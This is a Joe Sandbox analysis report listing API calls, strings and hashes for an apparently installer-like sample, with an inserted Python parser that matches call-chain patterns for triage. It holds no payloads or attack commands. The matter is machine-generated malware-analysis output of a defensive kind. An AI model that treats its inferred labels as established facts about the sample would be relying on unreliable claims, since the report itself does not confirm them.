                                                                                            • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                            • API String ID: 971782779-3668018701
                                                                                            • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                            • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                            • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                            • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                            Strings
                                                                                            • RegOpenKeyEx, xrefs: 00454910
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                            • , xrefs: 004548FE
                                                                                            Similarity
                                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2812809588-1577016196
                                                                                            • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                            • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                            • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                            APIs
                                                                                              • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                            Strings
                                                                                            • .NET Framework not found, xrefs: 0045961D
                                                                                            • v2.0.50727, xrefs: 0045955B
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                            • v1.1.4322, xrefs: 004595C2
                                                                                            • .NET Framework version %s not found, xrefs: 00459609
                                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                            • v4.0.30319, xrefs: 004594F1
                                                                                            Similarity
                                                                                            • API ID: Close$Open
                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                            • API String ID: 2976201327-446240816
                                                                                            • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                            • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                            • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                            Strings
                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                            • API String ID: 3355656108-1243109208
                                                                                            • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                            • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                            APIs
                                                                                              • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                            Strings
                                                                                            • , xrefs: 004545B1
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                            • RegCreateKeyEx, xrefs: 004545C3
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                            • API String ID: 2481121983-1280779767
                                                                                            • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                            • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                            • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                            APIs
                                                                                              • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                              • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                            • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                              • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                            • API String ID: 1549857992-2312673372
                                                                                            • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                            • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                            • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                            • API String ID: 4190037839-2312295185
                                                                                            • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                            • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                            • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 004629FC
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                            • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                            • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F194
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                            • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02113858,00000000), ref: 00458C79
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
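The per-function listings above record which Windows APIs each function calls (with the argument values the sandbox could recover and the call-site address), which of those calls are really issued by a callee ("Part of subcall function"), and the strings the function references. For triage it helps to turn this text back into per-function call sequences and match them against behaviour patterns: the overlapped TransactNamedPipe exchange (CreateEvent, TransactNamedPipe, GetLastError, a message-pumping wait, GetOverlappedResult), the copy-to-temp-and-wait-on-a-STATIC-window sequence that sits next to the /SECONDPHASE and _iu...tmp strings (in my reading these are the strings an Inno Setup uninstaller uses when it relaunches itself from a temp copy; the report itself does not say so), and the access to the SharedDLLs reference-count key. The parser and matcher below is an added example written for this page, not Joe Sandbox code; the `Call`/`Function` classes, the rule labels and the sample text (copied from the listings above with argument lists shortened) are my own constructions.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Strings' listings and flag call-chain patterns."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line: optional bullet, optional "Part of subcall function XXXXXXXX:", then
# Name.MODULE(args), ref: ADDRESS. Lines like "GetActiveWindow.USER32 ref: 004629FC"
# carry no argument list, so the parenthesised group is optional.
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: (?P<ref>[0-9A-Fa-f]{8})\s*$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def decode_arg(tok: str):
    """'?' is an unrecovered value, 8 hex digits become an int (a leading '-' marks a
    negative displacement such as the -00000020 passed to TransactNamedPipe), and
    anything else (STATIC, user32.dll, .tmp) stays a literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", tok)
    if m:
        return -int(m.group(2), 16) if m.group(1) else int(m.group(2), 16)
    return tok


def normalize(name: str) -> str:
    """Drop the ANSI/Unicode suffix so CreateFileA and CreateFileW compare equal."""
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str]  # callee address when the sandbox attributes the call to a subroutine


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def direct_api_names(self) -> List[str]:
        """Sequence of APIs the function itself issues, in listing order."""
        return [normalize(c.name) for c in self.calls if c.subcall_of is None]


def parse_api_line(line: str) -> Optional[Call]:
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [decode_arg(a) for a in raw.split(",")] if raw is not None else []
    return Call(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub"))


def parse_report(text: str) -> List[Function]:
    functions, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in HEADERS:          # every function block starts with its own "APIs" header
            section = stripped
            if stripped == "APIs":
                current = Function()
                functions.append(current)
            continue
        if current is None:
            continue
        if section == "APIs":
            call = parse_api_line(line)
            if call:
                current.calls.append(call)
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append(m.group("text"))
    return functions


def contains_subsequence(seq, pattern) -> bool:
    """True when every element of pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)


# (label, ordered API subsequence, substring that must appear in the function's strings or None)
RULES = [
    ("overlapped-named-pipe-transaction",
     ["CreateEvent", "TransactNamedPipe", "GetLastError", "MsgWaitForMultipleObjects", "GetOverlappedResult"], None),
    ("copy-file-and-wait-on-helper-window",
     ["CopyFile", "SetFileAttributes", "CreateWindowEx", "MsgWaitForMultipleObjects", "DestroyWindow"], None),
    ("shareddlls-refcount-registry-access",
     ["RegQueryValueEx", "RegCloseKey"], r"CurrentVersion\SharedDLLs"),
]


def match_rules(fn: Function) -> List[str]:
    names = fn.direct_api_names()
    return [label for label, pattern, needle in RULES
            if contains_subsequence(names, pattern)
            and (needle is None or any(needle in s for s in fn.strings))]


# Constructed sample: three function blocks from this report, argument lists shortened.
REPORT = r"""
APIs
  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF), ref: 0045464F
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001), ref: 0045478B
Strings
• , xrefs: 004545B1
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
• RegCreateKeyEx, xrefs: 004545C3
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
• CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
• SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
• CloseHandle.KERNEL32(?), ref: 00496DD8
• DestroyWindow.USER32(?), ref: 00496DEE
Strings
Memory Dump Source
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?), ref: 00458CD6
• GetLastError.KERNEL32(?,-00000020,0000000C), ref: 00458CE3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001), ref: 00458D55
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000), ref: 0045349F
Strings
"""

if __name__ == "__main__":
    for i, fn in enumerate(parse_report(REPORT)):
        print(i, fn.direct_api_names(), match_rules(fn))
```

Subcall entries are parsed but excluded from the matched sequence on purpose: the sandbox attributes them to the callee, so counting them here would make every caller of a logging or error helper (such as 0045349C's GetLastError) look like it performs that work itself. Rule patterns are ordered subsequences rather than exact matches, so the SetWindowLong and CloseHandle calls interleaved in the second block do not break the match.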
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
